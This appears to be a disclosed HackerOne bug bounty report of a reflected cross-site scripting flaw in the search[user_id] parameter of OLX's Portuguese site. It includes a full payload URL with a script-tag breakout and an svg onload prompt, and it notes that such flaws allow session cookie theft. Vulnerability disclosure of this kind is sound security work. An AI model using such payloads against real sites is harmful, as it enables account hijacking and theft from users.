OLX: XSS - main page - search[user_id] parameter

2019-01-10T20:59:48
ID H1:477771
Type hackerone
Reporter paulochoupina
Modified 2019-03-03T19:22:40

Description

Hi, how you doing?

This is a pretty straight foward XSS in the main page.

Affected parameter: search[user_id]

Direct Link: https://www.olx.pt/braga/?search[user_id]=1zqjeu'"(){}<x>:/1zqjeu;9</SCript><svG/onLoad=prompt(9)>, ;prompt(9);&view=galleryWide

Tested in updated firefox.

Impact

XSS allows a intruder to inject html and client side scripts in the browser of a victim, allowing for example the stealing of session cookies etc etc.